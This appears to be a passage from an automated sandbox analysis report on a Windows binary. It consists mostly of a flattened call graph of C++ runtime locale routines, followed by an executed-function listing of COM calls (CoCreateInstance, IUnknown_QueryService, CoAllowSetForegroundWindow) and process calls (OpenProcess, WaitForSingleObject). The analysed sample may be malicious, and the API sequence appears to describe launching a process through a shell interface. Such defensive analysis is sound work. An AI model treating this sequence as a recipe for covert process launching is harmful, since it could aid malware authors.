b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34256->34261 34262 b40340 34257->34262 34263 b40231 34258->34263 34259->34255 34264 b403d9 34260->34264 34265 b4043d 34261->34265 34266 b3ea02 std::locale::_Locimp::_Makeloc 72 API calls 34262->34266 34267 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34263->34267 34268 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34264->34268 34269 b3ec56 std::locale::_Locimp::_Makeloc 72 API calls 34265->34269 34270 b40348 34266->34270 34271 b4023e 34267->34271 34273 b403e6 34268->34273 34274 b40445 34269->34274 34275 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34270->34275 34272 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34271->34272 34276 b40247 34272->34276 34277 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34273->34277 34278 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34274->34278 34279 b40350 34275->34279 34284 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34276->34284 34280 b403ef 34277->34280 34278->34229 34281 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34279->34281 34282 b40411 34280->34282 34285 b400ed std::locale::_Locimp::_Makeloc 14 API calls 34280->34285 34283 b4035d 34281->34283 34289 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34282->34289 34286 b3eb2c std::locale::_Locimp::_Makeloc 72 API calls 34283->34286 34287 b40265 34284->34287 34285->34282 34288 b40365 34286->34288 34290 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34287->34290 34291 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34288->34291 34289->34229 34292 b40272 34290->34292 34293 b4036d 34291->34293 34294 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34292->34294 34295 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34293->34295 34296 b4027c 34294->34296 34297 b4037a 34295->34297 34299 b402aa 34296->34299 34301 b3ffea moneypunct 42 API calls 34296->34301 34298 b3ea97 std::locale::_Locimp::_Makeloc 72 API calls 34297->34298 34300 b40382 34298->34300 34302 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34299->34302 34303 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34300->34303 34301->34299 34304 b402c2 34302->34304 34303->34218 34305 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34304->34305 34306 b402cf 34305->34306 34307 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34306->34307 34308 b402d9 34307->34308 34309 b40308 34308->34309 34310 b3ffea moneypunct 42 API calls 34308->34310 34311 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34309->34311 34310->34309 34311->34218 34313 b38ea6 __EH_prolog3 34312->34313 34314 b38efb 34313->34314 34315 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34313->34315 34316 b38fde 34314->34316 34319 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34314->34319 34317 b38ec1 34315->34317 34318 b33a6b collate 74 API calls 34316->34318 34322 b38f00 34317->34322 34323 b38ec6 34317->34323 34320 b3903b 34318->34320 34321 b38f29 34319->34321 34324 b39091 34320->34324 34330 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34320->34330 34325 b38fe3 34321->34325 34326 b38f35 34321->34326 34327 b28610 std::locale::_Locimp::_Makeushloc 73 API calls 34322->34327 34328 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34323->34328 34332 b390e9 34324->34332 34338 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34324->34338 34334 b32c4a std::locale::_Locimp::_Makeushloc 72 API calls 34325->34334 34331 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34326->34331 34333 b38f0a 34327->34333 34329 b38ed0 34328->34329 34335 b38eed 34329->34335 34342 b28bd0 std::locale::_Locimp::_Makeushloc 41 API calls 34329->34342 34336 b39055 34330->34336 34337 b38f3c 34331->34337 34346 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34332->34346 34347 b39231 34332->34347 34339 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34333->34339 34340 b38feb 34334->34340 34352 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34335->34352 34343 b39096 34336->34343 34344 b3905b 34336->34344 34363 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34337->34363 34345 b390bd 34338->34345 34349 b38f12 34339->34349 34341 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34340->34341 34350 b38ff3 34341->34350 34342->34335 34358 b324b9 std::locale::_Locimp::_Makeushloc 74 API calls 34343->34358 34351 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34344->34351 34353 b390c5 34345->34353 34354 b390ee 34345->34354 34355 b39117 34346->34355 34348 b3933a 34347->34348 34356 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34347->34356 34357 b393ad std::locale::_Locimp::_Locimp_Addfac 34348->34357 34368 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34348->34368 34349->34314 34361 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34350->34361 34362 b39065 34351->34362 34352->34314 34364 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34353->34364 34359 b32678 std::locale::_Locimp::_Makeushloc 72 API calls 34354->34359 34365 b39123 34355->34365 34366 b39236 34355->34366 34367 b392bc 34356->34367 34357->34116 34360 b390a0 34358->34360 34369 b390f6 34359->34369 34370 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34360->34370 34372 b39000 34361->34372 34373 b3907d 34362->34373 34382 b42344 __Getcoll 41 API calls 34362->34382 34374 b38f59 34363->34374 34375 b390cc 34364->34375 34376 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34365->34376 34371 b327a2 std::locale::_Locimp::_Makeushloc 72 API calls 34366->34371 34377 b392c4 34367->34377 34378 b3933f 34367->34378 34379 b39381 34368->34379 34380 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34369->34380 34370->34324 34387 b3923e 34371->34387 34388 b2b700 std::locale::_Locimp::_Makeushloc 73 API calls 34372->34388 34391 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34373->34391 34389 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34374->34389 34405 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34375->34405 34383 b3912a 34376->34383 34384 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34377->34384 34381 b32e9e std::locale::_Locimp::_Makeushloc 73 API calls 34378->34381 34385 b393b2 34379->34385 34386 b39389 34379->34386 34380->34332 34390 b39347 34381->34390 34382->34373 34407 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34383->34407 34392 b392cb 34384->34392 34396 b3238f std::locale::_Locimp::_Makeushloc 72 API calls 34385->34396 34393 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34386->34393 34394 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34387->34394 34395 b3900a 34388->34395 34397 b38f66 34389->34397 34398 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34390->34398 34391->34324 34399 b392e5 34392->34399 34408 b33114 numpunct 44 API calls 34392->34408 34400 b39390 34393->34400 34401 b39246 34394->34401 34402 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34395->34402 34403 b393ba 34396->34403 34404 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34397->34404 34406 b3934f 34398->34406 34416 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34399->34416 34409 b393a3 34400->34409 34417 b330aa codecvt 41 API calls 34400->34417 34410 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34401->34410 34411 b39012 34402->34411 34412 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34403->34412 34413 b38f6f 34404->34413 34405->34332 34414 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34406->34414 34415 b39147 34407->34415 34408->34399 34419 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34409->34419 34418 b39253 34410->34418 34420 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34411->34420 34412->34357 34426 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34413->34426 34421 b3935c 34414->34421 34422 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34415->34422 34423 b392f5 34416->34423 34417->34409 34424 b328cc std::locale::_Locimp::_Makeushloc 72 API calls 34418->34424 34419->34357 34425 b3901f 34420->34425 34427 b2b500 std::locale::_Locimp::_Makeushloc 73 API calls 34421->34427 34428 b39154 34422->34428 34429 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34423->34429 34430 b3925d 34424->34430 34431 b2b8b0 std::locale::_Locimp::_Makeushloc 75 API calls 34425->34431 34432 b38f8c 34426->34432 34433 b39366 34427->34433 34434 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34428->34434 34435 b39302 34429->34435 34436 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34430->34436 34437 b39029 34431->34437 34438 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34432->34438 34439 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34433->34439 34440 b3915d 34434->34440 34441 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34435->34441 34442 b39265 34436->34442 34443 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34437->34443 34444 b38f99 34438->34444 34445 b3936e 34439->34445 34453 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34440->34453 34446 b3930c 34441->34446 34447 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34442->34447 34448 b39031 34443->34448 34449 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34444->34449 34445->34348 34450 b3932c 34446->34450 34454 b2bf80 std::locale::_Locimp::_Makeushloc 42 API calls 34446->34454 34451 b39272 34447->34451 34448->34316 34452 b38fa3 34449->34452 34459 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34450->34459 34455 b32b20 std::locale::_Locimp::_Makeushloc 72 API calls 34451->34455 34456 b38fcc 34452->34456 34460 b2bd90 std::locale::_Locimp::_Makeushloc 44 API calls 34452->34460 34457 b3917a 34453->34457 34454->34450 34458 b3927c 34455->34458 34464 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34456->34464 34461 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34457->34461 34462 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34458->34462 34459->34348 34460->34456 34465 b39187 34461->34465 34463 b39284 34462->34463 34466 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34463->34466 34464->34316 34467 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34465->34467 34468 b39291 34466->34468 34469 b39191 34467->34469 34470 b32a8b std::locale::_Locimp::_Makeushloc 72 API calls 34468->34470 34471 b391bd 34469->34471 34473 b38451 std::locale::_Locimp::_Makeushloc 42 API calls 34469->34473 34472 b3929b 34470->34472 34474 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34471->34474 34475 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34472->34475 34473->34471 34476 b391d5 34474->34476 34475->34347 34477 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34476->34477 34478 b391e2 34477->34478 34479 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34478->34479 34480 b391ec 34479->34480 34481 b39219 34480->34481 34482 b38451 std::locale::_Locimp::_Makeushloc 42 API calls 34480->34482 34483 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34481->34483 34482->34481 34483->34347 34485 b38975 __EH_prolog3 34484->34485 34486 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34485->34486 34529 b389ca 34485->34529 34487 b38990 34486->34487 34490 b38995 34487->34490 34491 b389cf 34487->34491 34488 b339c9 collate 74 API calls 34492 b38b0a 34488->34492 34489 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34493 b389f8 34489->34493 34495 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34490->34495 34494 b3254e std::locale::_Locimp::_Makeushloc 72 API calls 34491->34494 34501 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34492->34501 34558 b38b60 34492->34558 34496 b38ab2 34493->34496 34497 b38a04 34493->34497 34498 b389d9 34494->34498 34500 b3899f 34495->34500 34499 b32bb5 std::locale::_Locimp::_Makeushloc 72 API calls 34496->34499 34502 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34497->34502 34504 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34498->34504 34505 b38aba 34499->34505 34513 b3851c ctype 41 API calls 34500->34513 34525 b389bc 34500->34525 34506 b38b24 34501->34506 34507 b38a0b 34502->34507 34503 b38bb8 34510 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34503->34510 34511 b38d00 34503->34511 34504->34529 34512 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34505->34512 34514 b38b65 34506->34514 34515 b38b2a 34506->34515 34528 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34507->34528 34508 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34509 b38b8c 34508->34509 34517 b38b94 34509->34517 34518 b38bbd 34509->34518 34519 b38be6 34510->34519 34520 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34511->34520 34521 b38e09 34511->34521 34524 b38ac2 34512->34524 34513->34525 34523 b32424 std::locale::_Locimp::_Makeushloc 74 API calls 34514->34523 34526 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34515->34526 34516 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34516->34529 34530 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34517->34530 34535 b325e3 std::locale::_Locimp::_Makeushloc 72 API calls 34518->34535 34531 b38bf2 34519->34531 34532 b38d05 34519->34532 34533 b38d8b 34520->34533 34522 b38e7c std::locale::_Locimp::_Locimp_Addfac 34521->34522 34534 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34521->34534 34522->34128 34536 b38b6f 34523->34536 34537 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34524->34537 34525->34516 34527 b38b34 34526->34527 34538 b38b4c 34527->34538 34552 b42344 __Getcoll 41 API calls 34527->34552 34539 b38a28 34528->34539 34529->34489 34616 b38aad 34529->34616 34540 b38b9b 34530->34540 34541 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34531->34541 34545 b3270d std::locale::_Locimp::_Makeushloc 72 API calls 34532->34545 34542 b38d93 34533->34542 34543 b38e0e 34533->34543 34544 b38e50 34534->34544 34546 b38bc5 34535->34546 34547 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34536->34547 34548 b38acf 34537->34548 34563 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34538->34563 34549 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34539->34549 34571 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34540->34571 34553 b38bf9 34541->34553 34554 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34542->34554 34550 b32e09 std::locale::_Locimp::_Makeushloc 75 API calls 34543->34550 34555 b38e81 34544->34555 34556 b38e58 34544->34556 34557 b38d0d 34545->34557 34551 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34546->34551 34547->34558 34559 b32cdf std::locale::_Locimp::_Makeushloc 72 API calls 34548->34559 34560 b38a35 34549->34560 34562 b38e16 34550->34562 34551->34503 34552->34538 34580 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34553->34580 34564 b38d9a 34554->34564 34561 b322fa std::locale::_Locimp::_Makeushloc 72 API calls 34555->34561 34565 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34556->34565 34566 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34557->34566 34558->34503 34558->34508 34567 b38ad9 34559->34567 34569 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34560->34569 34570 b38e89 34561->34570 34572 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34562->34572 34563->34558 34573 b38db4 34564->34573 34581 b330e1 numpunct 46 API calls 34564->34581 34574 b38e5f 34565->34574 34575 b38d15 34566->34575 34568 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34567->34568 34576 b38ae1 34568->34576 34577 b38a3e 34569->34577 34578 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34570->34578 34571->34503 34579 b38e1e 34572->34579 34589 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34573->34589 34582 b38e72 34574->34582 34590 b33073 codecvt 41 API calls 34574->34590 34583 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34575->34583 34586 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34576->34586 34599 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34577->34599 34578->34522 34587 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34579->34587 34588 b38c16 34580->34588 34581->34573 34585 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34582->34585 34584 b38d22 34583->34584 34591 b32837 std::locale::_Locimp::_Makeushloc 72 API calls 34584->34591 34585->34522 34592 b38aee 34586->34592 34593 b38e2b 34587->34593 34594 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34588->34594 34595 b38dc4 34589->34595 34590->34582 34597 b38d2c 34591->34597 34598 b32d74 std::locale::_Locimp::_Makeushloc 74 API calls 34592->34598 34600 b32f33 std::locale::_Locimp::_Makeushloc 72 API calls 34593->34600 34601 b38c23 34594->34601 34596 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34595->34596 34602 b38dd1 34596->34602 34603 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34597->34603 34604 b38af8 34598->34604 34605 b38a5b 34599->34605 34606 b38e35 34600->34606 34607 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34601->34607 34608 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34602->34608 34609 b38d34 34603->34609 34610 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34604->34610 34611 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34605->34611 34612 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34606->34612 34613 b38c2c 34607->34613 34614 b38ddb 34608->34614 34615 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34609->34615 34610->34616 34617 b38a68 34611->34617 34612->34521 34621 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34613->34621 34618 b38dfb 34614->34618 34622 b3869e std::locale::_Locimp::_Makeushloc 42 API calls 34614->34622 34619 b38d41 34615->34619 34616->34488 34620 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34617->34620 34627 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34618->34627 34623 b329f6 std::locale::_Locimp::_Makeushloc 74 API calls 34619->34623 34624 b38a72 34620->34624 34625 b38c49 34621->34625 34622->34618 34626 b38d4b 34623->34626 34628 b38a9b 34624->34628 34631 b38555 std::locale::_Locimp::_Makeushloc 44 API calls 34624->34631 34629 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34625->34629 34630 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34626->34630 34627->34521 34634 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34628->34634 34632 b38c56 34629->34632 34633 b38d53 34630->34633 34631->34628 34635 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34632->34635 34636 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34633->34636 34634->34616 34637 b38c60 34635->34637 34638 b38d60 34636->34638 34639 b38c8c 34637->34639 34641 b38386 moneypunct 44 API calls 34637->34641 34640 b32961 std::locale::_Locimp::_Makeushloc 74 API calls 34638->34640 34643 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34639->34643 34642 b38d6a 34640->34642 34641->34639 34644 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34642->34644 34645 b38ca4 34643->34645 34644->34511 34646 b28c20 std::locale::_Locimp::_Makeushloc 9 API calls 34645->34646 34647 b38cb1 34646->34647 34648 b26330 std::locale::_Locimp::_Makeushloc LocalAlloc 34647->34648 34649 b38cbb 34648->34649 34650 b38ce8 34649->34650 34651 b38386 moneypunct 44 API calls 34649->34651 34652 b2f3d9 std::locale::_Locimp::_Locimp_Addfac 10 API calls 34650->34652 34651->34650 34652->34511 34654 b28c4b 34653->34654 34655 b28c7d 34653->34655 34656 b30ed6 std::_Lockit::_Lockit 7 API calls 34654->34656 34655->34095 34655->34096 34657 b28c55 34656->34657 34658 b30f2e std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 34657->34658 34658->34655 34659->34107 34660->34114 34661->34089 34662->34112 34663->34125 34664->34117 34665->34135 34666->34144 34667->34149 34668->34155 34669->34156 34670->34090 34671->34113 34672->34127 34673->34139 34674->34143 34675->34150 34676->34090 34677->34122 34678->34093 34679->34124 34680->34093 34682 b2c240 std::invalid_argument::invalid_argument 41 API calls 34681->34682 34683 b2d29d 34682->34683 34684 b43e5a 34683->34684 34685 b43ea1 RaiseException 34684->34685 34686 b43e74 34684->34686 34685->34163 34686->34685 34688 b25d6e 34687->34688 34690 b25d7d 34688->34690 34711 b24a10 41 API calls 3 library calls 34688->34711 34690->33806 34692 b259f8 34691->34692 34696 b25a03 34691->34696 34693 b25d30 41 API calls 34692->34693 34695 b25a01 34693->34695 34694 b22310 56 API calls 34697 b25a1a 34694->34697 34695->33812 34696->34694 34696->34697 34712 b25a60 42 API calls 34697->34712 34713 b47869 34699->34713 34703 b25971 34702->34703 34704 b2572d 34702->34704 34703->34704 34705 b25981 CloseHandle 34703->34705 34704->33845 34705->34704 34706->33828 34707->33818 34708->33821 34709->33825 34711->34690 34712->34695 34718 b47078 34713->34718 34719 b47096 34718->34719 34720 b4708f 34718->34720 34719->34720 34761 b557cc GetLastError 34719->34761 34726 b476d9 34720->34726 34729 b47709 ___crtCompareStringW 34726->34729 34731 b476f3 34726->34731 34728 b476f8 34802 b47017 41 API calls collate 34728->34802 34730 b47720 34729->34730 34729->34731 34734 b47702 34730->34734 34803 b55c2a 6 API calls 2 library calls 34730->34803 34801 b47370 14 API calls std::_Stofx_v2 34731->34801 34738 b42937 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34734->34738 34735 b4776e 34736 b4778f 34735->34736 34737 b47778 34735->34737 34740 b47794 34736->34740 34741 b477a5 34736->34741 34804 b47370 14 API calls std::_Stofx_v2 34737->34804 34742 b253d3 34738->34742 34806 b47370 14 API calls std::_Stofx_v2 34740->34806 34745 b47826 34741->34745 34751 b477b9 __alloca_probe_16 34741->34751 34807 b55bdc 34741->34807 34742->33810 34742->33816 34743 b4777d 34805 b47370 14 API calls std::_Stofx_v2 34743->34805 34817 b47370 14 API calls std::_Stofx_v2 34745->34817 34748 b4782b 34818 b47370 14 API calls std::_Stofx_v2 34748->34818 34751->34745 34754 b477e6 34751->34754 34752 b47813 34819 b42326 14 API calls std::_Locinfo::_W_Getmonths 34752->34819 34814 b55c2a 6 API calls 2 library calls 34754->34814 34756 b47802 34757 b47809 34756->34757 34758 b4781a 34756->34758 34815 b4b762 41 API calls 2 library calls 34757->34815 34816 b47370 14 API calls std::_Stofx_v2 34758->34816 34762 b557e2 34761->34762 34763 b557e8 34761->34763 34793 b575d7 6 API calls std::_Lockit::_Lockit 34762->34793 34767 b557ec SetLastError 34763->34767 34794 b57616 6 API calls std::_Lockit::_Lockit 34763->34794 34766 b55804 34766->34767 34769 b570bb __Getctype 14 API calls 34766->34769 34771 b55881 34767->34771 34772 b470b7 34767->34772 34770 b55819 34769->34770 34773 b55821 34770->34773 34774 b55832 34770->34774 34799 b52a07 41 API calls __FrameHandler3::FrameUnwindToState 34771->34799 34788 b55ab7 34772->34788 34795 b57616 6 API calls std::_Lockit::_Lockit 34773->34795 34796 b57616 6 API calls std::_Lockit::_Lockit 34774->34796 34779 b5582f 34783 b553b8 ___free_lconv_mon 14 API calls 34779->34783 34780 b5583e 34781 b55842 34780->34781 34782 b55859 34780->34782 34797 b57616 6 API calls std::_Lockit::_Lockit 34781->34797 34798 b555fa 14 API calls __Getctype 34782->34798 34783->34767 34786 b55864 34787 b553b8 ___free_lconv_mon 14 API calls 34786->34787 34787->34767 34789 b470cd 34788->34789 34790 b55aca 34788->34790 34792 b55b15 41 API calls std::_Locinfo::_W_Getmonths 34789->34792 34790->34789 34800 b5d657 41 API calls 4 library calls 34790->34800 34792->34720 34793->34763 34794->34766 34795->34779 34796->34780 34797->34779 34798->34786 34800->34789 34801->34728 34802->34734 34803->34735 34804->34743 34805->34734 34806->34728 34808 b55c1a 34807->34808 34812 b55bea std::_Locinfo::_W_Getmonths 34807->34812 34821 b47370 14 API calls std::_Stofx_v2 34808->34821 34810 b55c05 RtlAllocateHeap 34811 b55c18 34810->34811 34810->34812 34811->34751 34812->34808 34812->34810 34820 b5bf83 EnterCriticalSection LeaveCriticalSection std::_Locinfo::_W_Getmonths 34812->34820 34814->34756 34815->34752 34816->34752 34817->34748 34818->34752 34819->34734 34820->34812 34821->34811

                                                                  Executed Functions

                                                                  Function 00B24BA0 Relevance: 36.5, APIs: 24, Instructions: 502comCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 b24ba0-b24bf1 call b257c0 3 b24bf3-b24c10 call b252f0 0->3 4 b24c15-b24c4d CoInitialize CoCreateInstance 0->4 13 b25190-b251aa call b42937 3->13 6 b24c58-b24ca6 VariantInit 4->6 7 b24c4f-b24c53 4->7 14 b24cb1-b24cd5 IUnknown_QueryService 6->14 15 b24ca8-b24cac 6->15 9 b25169-b25172 7->9 11 b25174-b25176 9->11 12 b2517a-b25185 9->12 11->12 17 b25187 CoUninitialize 12->17 18 b2518d 12->18 21 b24ce0-b24cfa 14->21 22 b24cd7-b24cdb 14->22 19 b2514b-b25154 15->19 17->18 18->13 24 b25156-b25158 19->24 25 b2515c-b25167 VariantClear 19->25 28 b24d05-b24d26 21->28 29 b24cfc-b24d00 21->29 23 b2513a-b25143 22->23 23->19 26 b25145-b25147 23->26 24->25 25->9 26->19 33 b24d31-b24d4f IUnknown_QueryInterface_Proxy 28->33 34 b24d28-b24d2c 28->34 30 b25129-b25132 29->30 30->23 31 b25134-b25136 30->31 31->23 36 b24d51-b24d55 33->36 37 b24d5a-b24d74 33->37 35 b25118-b25121 34->35 35->30 38 b25123-b25125 35->38 39 b25107-b25110 36->39 42 b24d76-b24d7a 37->42 43 b24d7f-b24d9d IUnknown_QueryInterface_Proxy 37->43 38->30 39->35 41 b25112-b25114 39->41 41->35 44 b250f6-b250ff 42->44 45 b24da8-b24dc0 CoAllowSetForegroundWindow 43->45 46 b24d9f-b24da3 43->46 44->39 50 b25101-b25103 44->50 48 b24dc2-b24dc4 45->48 49 b24e28-b24e35 SysAllocString 45->49 47 b250e5-b250ee 46->47 47->44 51 b250f0-b250f2 47->51 52 b24dca-b24ded SysAllocString 48->52 53 b251ba-b25201 call b211d0 49->53 54 b24e3b 49->54 50->39 51->44 55 b24df8-b24e1b SysAllocString 52->55 56 b24def-b24df2 52->56 64 b25203-b25205 53->64 65 b25209-b25217 53->65 54->52 59 b24e3d-b24ebf VariantInit 55->59 60 b24e1d-b24e20 55->60 56->55 58 b251b0-b251b5 call b2cf40 56->58 58->53 67 b24ec1-b24ec5 59->67 68 b24eca-b24ece 59->68 60->58 63 b24e26 60->63 63->59 64->65 69 b250a0-b250df VariantClear * 4 SysFreeString 67->69 70 b24ed4 68->70 71 b2509c 68->71 69->47 72 b24ed6-b24f0c 70->72 71->69 73 b24f10-b24f19 72->73 73->73 74 b24f1b-b24fa2 call b224c0 call b212f0 call b23860 call b22e60 * 2 73->74 85 b24fa4-b24fa8 74->85 86 b24faa 74->86 87 b24fb1-b24fb3 85->87 86->87 88 b25036-b25046 87->88 89 b24fb9-b24fc3 87->89 92 b25048-b25057 88->92 93 b2508d-b25096 88->93 90 b24fd5-b25009 OpenProcess WaitForSingleObject 89->90 91 b24fc5-b24fd3 call b24270 89->91 95 b25013-b25023 90->95 96 b2500b-b2500d GetExitCodeProcess 90->96 91->90 97 b2506a-b2506c 92->97 98 b25059-b25064 92->98 93->71 93->72 95->88 100 b25025-b2502c CloseHandle 95->100 96->95 102 b25075-b25086 97->102 103 b2506e-b2506f LocalFree 97->103 98->97 101 b251ab call b47027 98->101 100->88 101->58 102->93 103->102
                                                                  APIs
                                                                    • Part of subcall function 00B257C0: GetCurrentProcess.KERNEL32(00000008,?,823FDEC6,?,-00000010), ref: 00B257D0
                                                                    • Part of subcall function 00B257C0: OpenProcessToken.ADVAPI32(00000000), ref: 00B257D7
                                                                  • CoInitialize.OLE32(00000000), ref: 00B24C15
                                                                  • CoCreateInstance.OLE32(00B672B0,00000000,00000004,00B75104,00000000,?), ref: 00B24C45
                                                                  • CoUninitialize.OLE32 ref: 00B25187
                                                                  • _com_issue_error.COMSUPP ref: 00B251B5
                                                                  Memory Dump Source
